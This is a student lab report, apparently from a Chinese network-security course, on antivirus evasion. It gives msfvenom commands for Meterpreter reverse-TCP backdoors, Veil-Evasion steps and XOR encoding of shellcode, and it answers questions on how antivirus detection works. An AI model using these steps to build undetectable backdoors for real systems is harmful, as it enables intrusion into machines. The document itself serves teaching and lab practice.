• 20155304 网络攻防技术 实验三 免杀原理与实践


    20155304 网络攻防技术 实验三 免杀原理与实践

    实验内容

    1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧

    使用上次实验产生的后门文件,放入老师提供的网址进行扫描,有48%的杀软报告病毒。
    image

    使用msf编码器

    利用msfvenom -p java/meterpreter/reverse_tcp lhost=(kali ip) lport=端口号 x> 5304_backjar.jar,生成jar文件,进行检测。

    image

    image

    使用Veil-Evasion重新编写源代码

    在Kali中安装veil,sudo apt-get install veil

    在Kali的终端中启动Veil-Evasion
    命令行中输入veil,后在veil中输入命令use evasion

    image

    依次输入如下命令生成你的可执行文件:

    use python/meterpreter/rev_tcp.py(设置payload)

    set LHOST Kali的IP(设置反弹连接IP)

    set LPORT 端口号(设置反弹端口)

    generate

    可执行文件名

    image

    image

    检测exe文件:

    image

    利用shellcode编程实现免杀

    使用命令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.253.128 LPORT=443 -f c生成C语言的shellcode。

    image

    将其手动复制到code::blocks中运行,生成exe可执行文件。

    进行免杀测试:

    image

    对shellcode进行更改

    对shellcode进行异或,每一位数异或0x47

    检测:

    image

    2.1.基础问题回答

    (1)杀软是如何检测出恶意代码的?

    基于特征码的检测:杀毒软件的病毒库记录了一些恶意软件的特征码,这些特征码由一个不大于64字节的特征串组成,根据已检测出或网络上公布的病毒,对其提取特征码,记录成病毒库,检测到程序时将程序与特征码比对即可判断是否是恶意代码。

    基于行为的恶意软件检测:在程序运行的状态下(动态)对其行为进行监控,如果有敏感行为会被认为是恶意程序

    (2)免杀是做什么?

    对恶意软件进行处理,使其不被杀毒软件所检测。

    (3)免杀的基本方法有哪些?

    用MSF编码器进行一次或多次编码

    veil-Evasion

    shellcode

    加壳

    2.2.实践总结与体会

    本次实验本身并不难,但虚拟机本身总是出现问题。在下次实验之前要重装虚拟机,以避免再出现束手无策的状况。在此次试验中,我了解到了病毒与杀软的大致工作原理,了解了病毒是如何进一步加工以避免被杀软检测,也让我深刻的认识到了病毒的危险与危害,应定期对电脑进行检查以查杀病毒。

  • 相关阅读:
    第一次作业-编译原理概述
    node 升级版本,指定的版本
    v-show,v-if切换组件echarts显示不全的问题
    js点击特效动画,小人动画
    路由懒加载
    echarts tree 点击动态添加子集实例
    echarts中数据过多加入滚动条,相关属性dataZoom介绍
    解决echarts x轴标签文字过多导致显示不全
    element-ui 单选框点击整个行为选中状态
    Eclipse上Maven环境配置使用
  • 原文地址:https://www.cnblogs.com/tyn5304/p/8796066.html
Copyright © 2020-2023  润新知